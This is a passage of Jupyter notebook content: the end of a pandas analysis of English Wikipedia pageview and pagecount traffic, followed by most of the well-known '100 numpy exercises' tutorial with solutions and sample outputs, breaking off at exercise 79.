pageview_mobile_app_views['month'] = pageview_mobile_app_views.apply(lambda row: row['timestamp'][4:6], axis = 1)
pageview_mobile_app_views = pageview_mobile_app_views[['year', 'month', 'views']]
pageview_mobile_web_views = pd.DataFrame(pageview_mobile_web_data['items'])
pageview_mobile_web_views['year'] = pageview_mobile_web_views.apply(lambda row: row['timestamp'][:4], axis = 1)
pageview_mobile_web_views['month'] = pageview_mobile_web_views.apply(lambda row: row['timestamp'][4:6], axis = 1)
pageview_mobile_web_views = pageview_mobile_web_views[['year', 'month', 'views']]
merged_pageview_mobile_views = pd.concat([pageview_mobile_app_views,pageview_mobile_web_views])
pageview_mobile_views = merged_pageview_mobile_views.groupby(['year', 'month']).agg({"views":['sum']}).reset_index()
pageview_mobile_views.columns = ['year', 'month', 'views']
pageview_mobile_views.head()
merged_pageview_all_views = pd.concat([pageview_desktop_views, pageview_mobile_views])
pageview_all_views = merged_pageview_all_views.groupby(['year', 'month']).agg({"views": ['sum']}).reset_index()
pageview_all_views.columns = ['year', 'month', 'views']
pageview_all_views.head()
###Output
_____no_output_____
###Markdown
Preparing Pagecount fields The following code aggregates the pagecounts to create the following output fields: `pagecount_desktop_views`, `pagecount_mobile_views`, `pagecount_all_views`
###Code
pagecount_desktop_views = pd.DataFrame(pagecount_desktop_data['items'])
pagecount_desktop_views['year'] = pagecount_desktop_views.apply(lambda row: row['timestamp'][:4], axis = 1)
pagecount_desktop_views['month'] = pagecount_desktop_views.apply(lambda row: row['timestamp'][4:6], axis = 1)
pagecount_desktop_views = pagecount_desktop_views[['year', 'month', 'count']]
pagecount_desktop_views.head()
pagecount_mobile_views = pd.DataFrame(pagecount_mobile_data['items'])
pagecount_mobile_views['year'] = pagecount_mobile_views.apply(lambda row: row['timestamp'][:4], axis = 1)
pagecount_mobile_views['month'] = pagecount_mobile_views.apply(lambda row: row['timestamp'][4:6], axis = 1)
pagecount_mobile_views = pagecount_mobile_views[['year', 'month', 'count']]
pagecount_mobile_views.head()
merged_pagecount_all_views = pd.concat([pagecount_desktop_views, pagecount_mobile_views])
pagecount_all_views = merged_pagecount_all_views.groupby(['year', 'month']).agg({"count": ['sum']}).reset_index()
pagecount_all_views.columns = ['year', 'month', 'count']
pagecount_all_views.head()
###Output
_____no_output_____
###Markdown
Concatenating all the fields to create the final csv file output
###Code
pagecount_all_views = pagecount_all_views.rename(columns = {'count' : 'pagecount_all_views'})
pagecount_desktop_views = pagecount_desktop_views.rename(columns = {'count' : 'pagecount_desktop_views'})
pagecount_mobile_views = pagecount_mobile_views.rename(columns = {'count' : 'pagecount_mobile_views'})
pageview_all_views = pageview_all_views.rename(columns = {'views' : 'pageview_all_views'})
pageview_desktop_views = pageview_desktop_views.rename(columns = {'views' : 'pageview_desktop_views'})
pageview_mobile_views = pageview_mobile_views.rename(columns = {'views' : 'pageview_mobile_views'})
all_dfs = [pagecount_all_views, pagecount_desktop_views, pagecount_mobile_views, pageview_all_views, pageview_desktop_views,pageview_mobile_views]
merged_df = functools.reduce(lambda left, right: pd.merge(left, right, on=['year', 'month'], how = 'outer'), all_dfs)
merged_df.pagecount_all_views = merged_df.pagecount_all_views.astype('Int64')
merged_df.pagecount_desktop_views = merged_df.pagecount_desktop_views.astype('Int64')
merged_df.pagecount_mobile_views = merged_df.pagecount_mobile_views.astype('Int64')
merged_df.pageview_all_views = merged_df.pageview_all_views.astype('Int64')
merged_df.pageview_desktop_views = merged_df.pageview_desktop_views.astype('Int64')
merged_df.pageview_mobile_views = merged_df.pageview_mobile_views.astype('Int64')
merged_df.to_csv(os.path.join(csv_output_folder, "en-wikipedia_traffic_200712-202008.csv"), index=False)
###Output
_____no_output_____
###Markdown
Step 3: Analyzing the Data Creating plot for final analysis The final plot for analysis is created using the matplotlib library.
###Code
# Creating date field for plotting the x-axis
merged_df['date'] = merged_df.apply(lambda r: datetime.datetime(int(r.year), int(r.month), 1), axis=1)
merged_df = merged_df.sort_values('date')
plt.figure(figsize=(18, 8))
plt.plot(merged_df['date'], merged_df['pageview_desktop_views']/1000000,color='g')
plt.plot(merged_df['date'], merged_df['pageview_mobile_views']/1000000,color='b')
plt.plot(merged_df['date'], merged_df['pageview_all_views']/1000000,color='black')
plt.plot(merged_df['date'], merged_df['pagecount_desktop_views']/1000000,color='g',linestyle='--')
plt.plot(merged_df['date'], merged_df['pagecount_mobile_views']/1000000,color='b',linestyle='--')
plt.plot(merged_df['date'], merged_df['pagecount_all_views']/1000000,color='black',linestyle='--')
plt.legend(["PageView Desktop","PageView Mobile", "PageView All", "PageCount Desktop","PageCount Mobile","PageCount All"])
plt.title("Page Views on English Wikipedia (x1,000,000)")
plt.grid()
plt.savefig("final_visualization.png")
###Output
_____no_output_____ |
numpy/numpy_test.ipynb | ###Markdown
100 numpy exercises This is a collection of exercises that have been collected in the numpy mailing list, on stack overflow and in the numpy documentation. The goal of this collection is to offer a quick reference for both old and new users but also to provide a set of exercises for those who teach. 1. Import the numpy package under the name `np` (★☆☆)
###Code
import numpy as np
a=np.array([1,2,3])
b=np.array([4,5,6])
print(np.vstack((a,b)))
###Output
[[1 2 3]
[4 5 6]]
###Markdown
2. Print the numpy version and the configuration (★☆☆)
###Code
print(np.__version__)
np.show_config()
###Output
1.15.1
lapack_opt_info:
libraries = ['mkl_rt', 'pthread']
library_dirs = ['/Users/yumei/anaconda3/lib']
define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]
include_dirs = ['/Users/yumei/anaconda3/include']
blas_opt_info:
libraries = ['mkl_rt', 'pthread']
library_dirs = ['/Users/yumei/anaconda3/lib']
define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]
include_dirs = ['/Users/yumei/anaconda3/include']
lapack_mkl_info:
libraries = ['mkl_rt', 'pthread']
library_dirs = ['/Users/yumei/anaconda3/lib']
define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]
include_dirs = ['/Users/yumei/anaconda3/include']
blas_mkl_info:
libraries = ['mkl_rt', 'pthread']
library_dirs = ['/Users/yumei/anaconda3/lib']
define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]
include_dirs = ['/Users/yumei/anaconda3/include']
mkl_info:
libraries = ['mkl_rt', 'pthread']
library_dirs = ['/Users/yumei/anaconda3/lib']
define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]
include_dirs = ['/Users/yumei/anaconda3/include']
###Markdown
3. Create a null vector of size 10 (★☆☆)
###Code
Z = np.zeros(10)
print(Z)
###Output
[0. 0. 0. 0. 0. 0. 0. 0. 0. 0.]
###Markdown
4. How to find the memory size of any array (★☆☆)
###Code
Z = np.zeros((10,10))
print("%d bytes" % (Z.size * Z.itemsize))
###Output
800 bytes
###Markdown
5. How to get the documentation of the numpy add function from the command line? (★☆☆)
###Code
# From the command line: python -c "import numpy; numpy.info(numpy.add)"
# The equivalent call inside the notebook:
np.info(np.add)
###Output
_____no_output_____
###Markdown
6. Create a null vector of size 10 but the fifth value which is 1 (★☆☆)
###Code
Z = np.zeros(10)
Z[4] = 1
print(Z)
###Output
[0. 0. 0. 0. 1. 0. 0. 0. 0. 0.]
###Markdown
7. Create a vector with values ranging from 10 to 49 (★☆☆)
###Code
Z = np.arange(10,50)
print(Z)
###Output
[10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33
34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49]
###Markdown
8. Reverse a vector (first element becomes last) (★☆☆)
###Code
Z = np.arange(50)
Z = Z[::-1]
print(Z)
###Output
[49 48 47 46 45 44 43 42 41 40 39 38 37 36 35 34 33 32 31 30 29 28 27 26
25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2
1 0]
###Markdown
9. Create a 3x3 matrix with values ranging from 0 to 8 (★☆☆)
###Code
Z = np.arange(9).reshape(3,3)
print(Z)
###Output
[[0 1 2]
[3 4 5]
[6 7 8]]
###Markdown
10. Find indices of non-zero elements from \[1,2,0,0,4,0\] (★☆☆)
###Code
nz = np.nonzero([1,2,0,0,4,0])
print(nz)
###Output
(array([0, 1, 4]),)
###Markdown
11. Create a 3x3 identity matrix (★☆☆)
###Code
Z = np.eye(3)
print(Z)
###Output
[[1. 0. 0.]
[0. 1. 0.]
[0. 0. 1.]]
###Markdown
12. Create a 3x3x3 array with random values (★☆☆)
###Code
Z = np.random.random((3,3,3))
print(Z)
###Output
[[[0.53538205 0.89826967 0.52429946]
[0.5224464 0.43697246 0.46813808]
[0.41888029 0.00380832 0.90120746]]
[[0.8183299 0.6864285 0.22187739]
[0.499926 0.01759788 0.20627718]
[0.86462224 0.30962975 0.96285294]]
[[0.36556949 0.33610718 0.86920154]
[0.88025697 0.9917684 0.12386331]
[0.99962136 0.51710727 0.17636221]]]
###Markdown
13. Create a 10x10 array with random values and find the minimum and maximum values (★☆☆)
###Code
Z = np.random.random((10,10))
Zmin, Zmax = Z.min(), Z.max()
print(Zmin, Zmax)
###Output
(0.0024024835938185607, 0.9955171333482343)
###Markdown
14. Create a random vector of size 30 and find the mean value (★☆☆)
###Code
Z = np.random.random(30)
m = Z.mean()
print(Z)
print(m)
###Output
[0.95441691 0.74087704 0.7412656 0.00572944 0.66722554 0.70236887
0.07954851 0.06672898 0.53048422 0.40783689 0.846075 0.09090283
0.63068998 0.23041961 0.86174037 0.67322445 0.78001924 0.41436689
0.0867322 0.97043283 0.65383273 0.68087747 0.98077876 0.38868797
0.05757929 0.92593766 0.77028409 0.06129894 0.25854888 0.77283708]
0.5343916083058214
###Markdown
15. Create a 2d array with 1 on the border and 0 inside (★☆☆)
###Code
Z = np.ones((10,10))
Z[1:-1,1:-1] = 0
print(Z)
###Output
[[1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]
[1. 0. 0. 0. 0. 0. 0. 0. 0. 1.]
[1. 0. 0. 0. 0. 0. 0. 0. 0. 1.]
[1. 0. 0. 0. 0. 0. 0. 0. 0. 1.]
[1. 0. 0. 0. 0. 0. 0. 0. 0. 1.]
[1. 0. 0. 0. 0. 0. 0. 0. 0. 1.]
[1. 0. 0. 0. 0. 0. 0. 0. 0. 1.]
[1. 0. 0. 0. 0. 0. 0. 0. 0. 1.]
[1. 0. 0. 0. 0. 0. 0. 0. 0. 1.]
[1. 1. 1. 1. 1. 1. 1. 1. 1. 1.]]
###Markdown
16. How to add a border (filled with 0's) around an existing array? (★☆☆)
###Code
Z = np.ones((5,5))
Z = np.pad(Z, pad_width=1, mode='constant', constant_values=0)
print(Z)
###Output
[[0. 0. 0. 0. 0. 0. 0.]
[0. 1. 1. 1. 1. 1. 0.]
[0. 1. 1. 1. 1. 1. 0.]
[0. 1. 1. 1. 1. 1. 0.]
[0. 1. 1. 1. 1. 1. 0.]
[0. 1. 1. 1. 1. 1. 0.]
[0. 0. 0. 0. 0. 0. 0.]]
###Markdown
17. What is the result of the following expression? (★☆☆)
###Code
print(0 * np.nan)
print(np.nan == np.nan)
print(np.inf > np.nan)
print(np.nan - np.nan)
print(0.3 == 3 * 0.1)
###Output
nan
False
False
nan
False
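###Markdown
A brief aside, not part of the original exercise: the last comparison is False because 0.1 has no exact binary floating-point representation, so `3 * 0.1` picks up rounding error.
###Code
print(abs(0.3 - 3 * 0.1)) # tiny but nonzero, on the order of 1e-17
###Output
_____no_output_____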
###Markdown
18. Create a 5x5 matrix with values 1,2,3,4 just below the diagonal (★☆☆)
###Code
Z = np.diag(1+np.arange(4),k=-1)
print(Z)
###Output
[[0 0 0 0 0]
[1 0 0 0 0]
[0 2 0 0 0]
[0 0 3 0 0]
[0 0 0 4 0]]
###Markdown
19. Create a 8x8 matrix and fill it with a checkerboard pattern (★☆☆)
###Code
Z = np.zeros((8,8),dtype=int)
Z[1::2,::2] = 1
Z[::2,1::2] = 2
print(Z)
###Output
[[0 2 0 2 0 2 0 2]
[1 0 1 0 1 0 1 0]
[0 2 0 2 0 2 0 2]
[1 0 1 0 1 0 1 0]
[0 2 0 2 0 2 0 2]
[1 0 1 0 1 0 1 0]
[0 2 0 2 0 2 0 2]
[1 0 1 0 1 0 1 0]]
###Markdown
20. Consider a (6,7,8) shape array, what is the index (x,y,z) of the 100th element?
###Code
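# unravel_index maps the flat index 100 (0-based, C order) back to coordinates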
print(np.unravel_index(100,(6,7,8)))
###Output
(1, 5, 4)
###Markdown
21. Create a checkerboard 8x8 matrix using the tile function (★☆☆)
###Code
Z = np.tile( np.array([[0,1],[1,0]]), (4,4))
print(Z)
###Output
[[0 1 0 1 0 1 0 1]
[1 0 1 0 1 0 1 0]
[0 1 0 1 0 1 0 1]
[1 0 1 0 1 0 1 0]
[0 1 0 1 0 1 0 1]
[1 0 1 0 1 0 1 0]
[0 1 0 1 0 1 0 1]
[1 0 1 0 1 0 1 0]]
###Markdown
22. Normalize a 5x5 random matrix (★☆☆)
###Code
Z = np.random.random((5,5))
Zmax, Zmin = Z.max(), Z.min()
Z = (Z - Zmin)/(Zmax - Zmin)
print(Z)
###Output
[[0.18452857 0.76344432 1. 0.65831803 0.37058484]
[0. 0.90348196 0.88659306 0.4483884 0.39140004]
[0.36680489 0.58821671 0.8384351 0.3455739 0.37715739]
[0.34925911 0.17920659 0.30043554 0.19351988 0.22912706]
[0.20359098 0.10572 0.74160808 0.82760094 0.6004225 ]]
###Markdown
23. Create a custom dtype that describes a color as four unsigned bytes (RGBA) (★☆☆)
###Code
# the (type, 1) item-shape form is deprecated in newer numpy; use plain types
color = np.dtype([("r", np.ubyte),
                  ("g", np.ubyte),
                  ("b", np.ubyte),
                  ("a", np.ubyte)])
###Output
_____no_output_____
###Markdown
24. Multiply a 5x3 matrix by a 3x2 matrix (real matrix product) (★☆☆)
###Code
Z = np.dot(np.ones((5,3)), np.ones((3,2)))
print(Z)
# Alternative solution, in Python 3.5 and above
#Z = np.ones((5,3)) @ np.ones((3,2))
###Output
[[3. 3.]
[3. 3.]
[3. 3.]
[3. 3.]
[3. 3.]]
###Markdown
25. Given a 1D array, negate all elements which are between 3 and 8, in place. (★☆☆)
###Code
# Author: Evgeni Burovski
Z = np.arange(11)
Z[(3 < Z) & (Z <= 8)] *= -1
print(Z)
###Output
[ 0 1 2 3 -4 -5 -6 -7 -8 9 10]
###Markdown
26. What is the output of the following script? (★☆☆)
###Code
# Author: Jake VanderPlas
print(sum(range(5),-1))
from numpy import *
print(sum(range(5),-1))
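# the first print uses the builtin sum, where -1 is the start value (result: 9);
# after the star import, sum is numpy's, where -1 is the axis (result: 10)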
###Output
_____no_output_____
###Markdown
27. Consider an integer vector Z, which of these expressions are legal? (★☆☆)
###Code
Z**Z
2 << Z >> 2
Z <- Z
1j*Z
Z/1/1
Z<Z>Z
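# all of these are legal except Z<Z>Z: the chained comparison asks for the truth
# value of an intermediate boolean array, which raises a ValueError; note that
# Z <- Z parses as Z < (-Z), not as an assignment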
###Output
_____no_output_____
###Markdown
28. What are the results of the following expressions?
###Code
print(np.array(0) / np.array(0))
print(np.array(0) // np.array(0))
print(np.array([np.nan]).astype(int).astype(float))
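# expected: nan and 0 (each with a RuntimeWarning), then a platform-dependent
# large value, since nan has no faithful integer representation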
###Output
_____no_output_____
###Markdown
29. How to round away from zero a float array ? (★☆☆)
###Code
# Author: Charles R Harris
Z = np.random.uniform(-10,+10,10)
print (np.copysign(np.ceil(np.abs(Z)), Z))
###Output
_____no_output_____
###Markdown
30. How to find common values between two arrays? (★☆☆)
###Code
Z1 = np.random.randint(0,10,10)
Z2 = np.random.randint(0,10,10)
print(np.intersect1d(Z1,Z2))
###Output
_____no_output_____
###Markdown
31. How to ignore all numpy warnings (not recommended)? (★☆☆)
###Code
# Turn all numpy warnings off
defaults = np.seterr(all="ignore")
Z = np.ones(1) / 0
# Back to sanity
_ = np.seterr(**defaults)
# An equivalent way, with a context manager:
with np.errstate(divide='ignore'):
Z = np.ones(1) / 0
###Output
_____no_output_____
###Markdown
32. Is the following expression true? (★☆☆)
###Code
np.sqrt(-1) == np.emath.sqrt(-1)
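# False: np.sqrt(-1) is nan (real domain, with a warning), whereas
# np.emath.sqrt(-1) returns 1j in the complex domain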
###Output
_____no_output_____
###Markdown
33. How to get the dates of yesterday, today and tomorrow? (★☆☆)
###Code
yesterday = np.datetime64('today', 'D') - np.timedelta64(1, 'D')
today = np.datetime64('today', 'D')
tomorrow = np.datetime64('today', 'D') + np.timedelta64(1, 'D')
###Output
_____no_output_____
###Markdown
34. How to get all the dates corresponding to the month of July 2016? (★★☆)
###Code
Z = np.arange('2016-07', '2016-08', dtype='datetime64[D]')
print(Z)
###Output
_____no_output_____
###Markdown
35. How to compute ((A+B)\*(-A/2)) in place (without copy)? (★★☆)
###Code
A = np.ones(3)*1
B = np.ones(3)*2
C = np.ones(3)*3
np.add(A,B,out=B)
np.divide(A,2,out=A)
np.negative(A,out=A)
np.multiply(A,B,out=A)
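# A now holds (A+B)*(-A/2); each ufunc wrote into an existing buffer via out=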
###Output
_____no_output_____
###Markdown
36. Extract the integer part of a random array using 5 different methods (★★☆)
###Code
Z = np.random.uniform(0,10,10)
print (Z - Z%1)
print (np.floor(Z))
print (np.ceil(Z)-1)
print (Z.astype(int))
print (np.trunc(Z))
###Output
_____no_output_____
###Markdown
37. Create a 5x5 matrix with row values ranging from 0 to 4 (★★☆)
###Code
Z = np.zeros((5,5))
Z += np.arange(5)
print(Z)
###Output
_____no_output_____
###Markdown
38. Consider a generator function that generates 10 integers and use it to build an array (★☆☆)
###Code
def generate():
for x in range(10):
yield x
Z = np.fromiter(generate(),dtype=float,count=-1)
print(Z)
###Output
_____no_output_____
###Markdown
39. Create a vector of size 10 with values ranging from 0 to 1, both excluded (★★☆)
###Code
Z = np.linspace(0,1,11,endpoint=False)[1:]
print(Z)
###Output
_____no_output_____
###Markdown
40. Create a random vector of size 10 and sort it (★★☆)
###Code
Z = np.random.random(10)
Z.sort()
print(Z)
###Output
_____no_output_____
###Markdown
41. How to sum a small array faster than np.sum? (★★☆)
###Code
# Author: Evgeni Burovski
Z = np.arange(10)
np.add.reduce(Z)
###Output
_____no_output_____
###Markdown
42. Consider two random array A and B, check if they are equal (★★☆)
###Code
A = np.random.randint(0,2,5)
B = np.random.randint(0,2,5)
# Assuming identical shape of the arrays and a tolerance for the comparison of values
equal = np.allclose(A,B)
print(equal)
# Checking both the shape and the element values, no tolerance (values have to be exactly equal)
equal = np.array_equal(A,B)
print(equal)
###Output
_____no_output_____
###Markdown
43. Make an array immutable (read-only) (★★☆)
###Code
Z = np.zeros(10)
Z.flags.writeable = False
Z[0] = 1
###Output
_____no_output_____
###Markdown
44. Consider a random 10x2 matrix representing cartesian coordinates, convert them to polar coordinates (★★☆)
###Code
Z = np.random.random((10,2))
X,Y = Z[:,0], Z[:,1]
R = np.sqrt(X**2+Y**2)
T = np.arctan2(Y,X)
print(R)
print(T)
###Output
_____no_output_____
###Markdown
45. Create random vector of size 10 and replace the maximum value by 0 (★★☆)
###Code
Z = np.random.random(10)
Z[Z.argmax()] = 0
print(Z)
###Output
_____no_output_____
###Markdown
46. Create a structured array with `x` and `y` coordinates covering the \[0,1\]x\[0,1\] area (★★☆)
###Code
Z = np.zeros((5,5), [('x',float),('y',float)])
Z['x'], Z['y'] = np.meshgrid(np.linspace(0,1,5),
np.linspace(0,1,5))
print(Z)
###Output
_____no_output_____
###Markdown
47. Given two arrays, X and Y, construct the Cauchy matrix C (Cij = 1/(xi - yj))
###Code
# Author: Evgeni Burovski
X = np.arange(8)
Y = X + 0.5
C = 1.0 / np.subtract.outer(X, Y)
print(np.linalg.det(C))
###Output
_____no_output_____
###Markdown
48. Print the minimum and maximum representable value for each numpy scalar type (★★☆)
###Code
for dtype in [np.int8, np.int32, np.int64]:
print(np.iinfo(dtype).min)
print(np.iinfo(dtype).max)
for dtype in [np.float32, np.float64]:
print(np.finfo(dtype).min)
print(np.finfo(dtype).max)
print(np.finfo(dtype).eps)
###Output
_____no_output_____
###Markdown
49. How to print all the values of an array? (★★☆)
###Code
np.set_printoptions(threshold=float("inf"))  # np.nan is no longer accepted here
Z = np.zeros((16,16))
print(Z)
###Output
_____no_output_____
###Markdown
50. How to find the closest value (to a given scalar) in a vector? (★★☆)
###Code
Z = np.arange(100)
v = np.random.uniform(0,100)
index = (np.abs(Z-v)).argmin()
print(Z[index])
###Output
_____no_output_____
###Markdown
51. Create a structured array representing a position (x,y) and a color (r,g,b) (★★☆)
###Code
Z = np.zeros(10, [ ('position', [ ('x', float),
                                  ('y', float)]),
                   ('color',    [ ('r', float),
                                  ('g', float),
                                  ('b', float)])])
print(Z)
###Output
_____no_output_____
###Markdown
52. Consider a random vector with shape (100,2) representing coordinates, find point by point distances (★★☆)
###Code
Z = np.random.random((10,2))
X,Y = np.atleast_2d(Z[:,0], Z[:,1])
D = np.sqrt( (X-X.T)**2 + (Y-Y.T)**2)
print(D)
# Much faster with scipy
import scipy
# Thanks Gavin Heverly-Coulson (#issue 1)
import scipy.spatial
Z = np.random.random((10,2))
D = scipy.spatial.distance.cdist(Z,Z)
print(D)
###Output
_____no_output_____
###Markdown
53. How to convert a float (32 bits) array into an integer (32 bits) in place?
###Code
# a view shares the buffer, so assigning through it casts the values in place
Z = (np.random.rand(10)*100).astype(np.float32)
Y = Z.view(np.int32)
Y[:] = Z
print(Y)
###Output
_____no_output_____
###Markdown
54. How to read the following file? (★★☆)
###Code
from io import StringIO
# Fake file
s = StringIO("""1, 2, 3, 4, 5\n
6, , , 7, 8\n
, , 9,10,11\n""")
Z = np.genfromtxt(s, delimiter=",", dtype=int)  # np.int was removed from numpy
print(Z)
###Output
_____no_output_____
###Markdown
55. What is the equivalent of enumerate for numpy arrays? (★★☆)
###Code
Z = np.arange(9).reshape(3,3)
for index, value in np.ndenumerate(Z):
print(index, value)
for index in np.ndindex(Z.shape):
print(index, Z[index])
###Output
_____no_output_____
###Markdown
56. Generate a generic 2D Gaussian-like array (★★☆)
###Code
X, Y = np.meshgrid(np.linspace(-1,1,10), np.linspace(-1,1,10))
D = np.sqrt(X*X+Y*Y)
sigma, mu = 1.0, 0.0
G = np.exp(-( (D-mu)**2 / ( 2.0 * sigma**2 ) ) )
print(G)
###Output
_____no_output_____
###Markdown
57. How to randomly place p elements in a 2D array? (★★☆)
###Code
# Author: Divakar
n = 10
p = 3
Z = np.zeros((n,n))
np.put(Z, np.random.choice(range(n*n), p, replace=False),1)
print(Z)
###Output
_____no_output_____
###Markdown
58. Subtract the mean of each row of a matrix (★★☆)
###Code
# Author: Warren Weckesser
X = np.random.rand(5, 10)
# Recent versions of numpy
Y = X - X.mean(axis=1, keepdims=True)
# Older versions of numpy
Y = X - X.mean(axis=1).reshape(-1, 1)
print(Y)
###Output
_____no_output_____
###Markdown
59. How to sort an array by the nth column? (★★☆)
###Code
# Author: Steve Tjoa
Z = np.random.randint(0,10,(3,3))
print(Z)
print(Z[Z[:,1].argsort()])
###Output
_____no_output_____
###Markdown
60. How to tell if a given 2D array has null columns? (★★☆)
###Code
# Author: Warren Weckesser
Z = np.random.randint(0,3,(3,10))
print((~Z.any(axis=0)).any())
###Output
_____no_output_____
###Markdown
61. Find the nearest value from a given value in an array (★★☆)
###Code
Z = np.random.uniform(0,1,10)
z = 0.5
m = Z.flat[np.abs(Z - z).argmin()]
print(m)
###Output
_____no_output_____
###Markdown
62. Considering two arrays with shape (1,3) and (3,1), how to compute their sum using an iterator? (★★☆)
###Code
A = np.arange(3).reshape(3,1)
B = np.arange(3).reshape(1,3)
it = np.nditer([A,B,None])
for x,y,z in it: z[...] = x + y
print(it.operands[2])
###Output
_____no_output_____
###Markdown
63. Create an array class that has a name attribute (★★☆)
###Code
class NamedArray(np.ndarray):
def __new__(cls, array, name="no name"):
obj = np.asarray(array).view(cls)
obj.name = name
return obj
def __array_finalize__(self, obj):
if obj is None: return
        self.name = getattr(obj, 'name', "no name")
Z = NamedArray(np.arange(10), "range_10")
print (Z.name)
###Output
_____no_output_____
###Markdown
64. Consider a given vector, how to add 1 to each element indexed by a second vector (be careful with repeated indices)? (★★★)
###Code
# Author: Brett Olsen
Z = np.ones(10)
I = np.random.randint(0,len(Z),20)
Z += np.bincount(I, minlength=len(Z))
print(Z)
# Another solution
# Author: Bartosz Telenczuk
np.add.at(Z, I, 1)
print(Z)
###Output
_____no_output_____
###Markdown
65. How to accumulate elements of a vector (X) to an array (F) based on an index list (I)? (★★★)
###Code
# Author: Alan G Isaac
X = [1,2,3,4,5,6]
I = [1,3,9,3,4,1]
F = np.bincount(I,X)
print(F)
###Output
_____no_output_____
###Markdown
66. Considering a (w,h,3) image of (dtype=ubyte), compute the number of unique colors (★★★)
###Code
# Author: Nadav Horesh
w,h = 16,16
I = np.random.randint(0,2,(h,w,3)).astype(np.ubyte)
# Note that we should compute 256*256 first.
# Otherwise numpy will only promote F.dtype to 'uint16' and overflow will occur
F = I[...,0]*(256*256) + I[...,1]*256 +I[...,2]
n = len(np.unique(F))
print(n)
###Output
_____no_output_____
###Markdown
67. Considering a four-dimensional array, how to get the sum over the last two axes at once? (★★★)
###Code
A = np.random.randint(0,10,(3,4,3,4))
# solution by passing a tuple of axes (introduced in numpy 1.7.0)
sum = A.sum(axis=(-2,-1))
print(sum)
# solution by flattening the last two dimensions into one
# (useful for functions that don't accept tuples for axis argument)
sum = A.reshape(A.shape[:-2] + (-1,)).sum(axis=-1)
print(sum)
###Output
_____no_output_____
###Markdown
68. Considering a one-dimensional vector D, how to compute means of subsets of D using a vector S of same size describing subset indices? (★★★)
###Code
# Author: Jaime Fernández del Río
D = np.random.uniform(0,1,100)
S = np.random.randint(0,10,100)
D_sums = np.bincount(S, weights=D)
D_counts = np.bincount(S)
D_means = D_sums / D_counts
print(D_means)
# Pandas solution as a reference due to more intuitive code
import pandas as pd
print(pd.Series(D).groupby(S).mean())
###Output
_____no_output_____
###Markdown
69. How to get the diagonal of a dot product? (★★★)
###Code
# Author: Mathieu Blondel
A = np.random.uniform(0,1,(5,5))
B = np.random.uniform(0,1,(5,5))
# Slow version
np.diag(np.dot(A, B))
# Fast version
np.sum(A * B.T, axis=1)
# Faster version
np.einsum("ij,ji->i", A, B)
###Output
_____no_output_____
###Markdown
70. Consider the vector \[1, 2, 3, 4, 5\], how to build a new vector with 3 consecutive zeros interleaved between each value? (★★★)
###Code
# Author: Warren Weckesser
Z = np.array([1,2,3,4,5])
nz = 3
Z0 = np.zeros(len(Z) + (len(Z)-1)*(nz))
Z0[::nz+1] = Z
print(Z0)
###Output
_____no_output_____
###Markdown
71. Consider an array of dimension (5,5,3), how to multiply it by an array with dimensions (5,5)? (★★★)
###Code
A = np.ones((5,5,3))
B = 2*np.ones((5,5))
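# B[:,:,None] has shape (5,5,1), which broadcasts against A's (5,5,3)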
print(A * B[:,:,None])
###Output
_____no_output_____
###Markdown
72. How to swap two rows of an array? (★★★)
###Code
# Author: Eelco Hoogendoorn
A = np.arange(25).reshape(5,5)
A[[0,1]] = A[[1,0]]
print(A)
###Output
_____no_output_____
###Markdown
73. Consider a set of 10 triplets describing 10 triangles (with shared vertices), find the set of unique line segments composing all the triangles (★★★)
###Code
# Author: Nicolas P. Rougier
faces = np.random.randint(0,100,(10,3))
F = np.roll(faces.repeat(2,axis=1),-1,axis=1)
F = F.reshape(len(F)*3,2)
F = np.sort(F,axis=1)
G = F.view( dtype=[('p0',F.dtype),('p1',F.dtype)] )
G = np.unique(G)
print(G)
###Output
_____no_output_____
###Markdown
74. Given an array C that is a bincount, how to produce an array A such that np.bincount(A) == C? (★★★)
###Code
# Author: Jaime Fernández del Río
C = np.bincount([1,1,2,3,4,4,6])
A = np.repeat(np.arange(len(C)), C)
print(A)
###Output
_____no_output_____
###Markdown
75. How to compute averages using a sliding window over an array? (★★★)
###Code
# Author: Jaime Fernández del Río
def moving_average(a, n=3) :
ret = np.cumsum(a, dtype=float)
ret[n:] = ret[n:] - ret[:-n]
return ret[n - 1:] / n
Z = np.arange(20)
print(moving_average(Z, n=3))
###Output
_____no_output_____
###Markdown
76. Consider a one-dimensional array Z, build a two-dimensional array whose first row is (Z\[0\],Z\[1\],Z\[2\]) and each subsequent row is shifted by 1 (last row should be (Z\[-3\],Z\[-2\],Z\[-1\])) (★★★)
###Code
# Author: Joe Kington / Erik Rigtorp
from numpy.lib import stride_tricks
def rolling(a, window):
shape = (a.size - window + 1, window)
strides = (a.itemsize, a.itemsize)
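    # consecutive windows start one element apart, so both strides advance by a
    # single itemsize; as_strided builds a view without copying any data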
return stride_tricks.as_strided(a, shape=shape, strides=strides)
Z = rolling(np.arange(10), 3)
print(Z)
###Output
_____no_output_____
###Markdown
77. How to negate a boolean, or to change the sign of a float inplace? (★★★)
###Code
# Author: Nathaniel J. Smith
Z = np.random.randint(0,2,100)
np.logical_not(Z, out=Z)
Z = np.random.uniform(-1.0,1.0,100)
np.negative(Z, out=Z)
###Output
_____no_output_____
###Markdown
78. Consider 2 sets of points P0,P1 describing lines (2d) and a point p, how to compute distance from p to each line i (P0\[i\],P1\[i\])? (★★★)
###Code
def distance(P0, P1, p):
T = P1 - P0
L = (T**2).sum(axis=1)
U = -((P0[:,0]-p[...,0])*T[:,0] + (P0[:,1]-p[...,1])*T[:,1]) / L
U = U.reshape(len(U),1)
D = P0 + U*T - p
return np.sqrt((D**2).sum(axis=1))
P0 = np.random.uniform(-10,10,(10,2))
P1 = np.random.uniform(-10,10,(10,2))
p = np.random.uniform(-10,10,( 1,2))
print(distance(P0, P1, p))
###Output
_____no_output_____
###Markdown
79. Consider 2 sets of points P0,P1 describing lines (2d) and a set of points P, how to compute distance from each point j (P\[j\]) to each line i (P0\[i\],P1\[i\])? (★★★)
###Code
# Author: Italmassov Kuanysh
# based on distance function from previous question
P0 = np.random.uniform(-10, 10, (10,2))
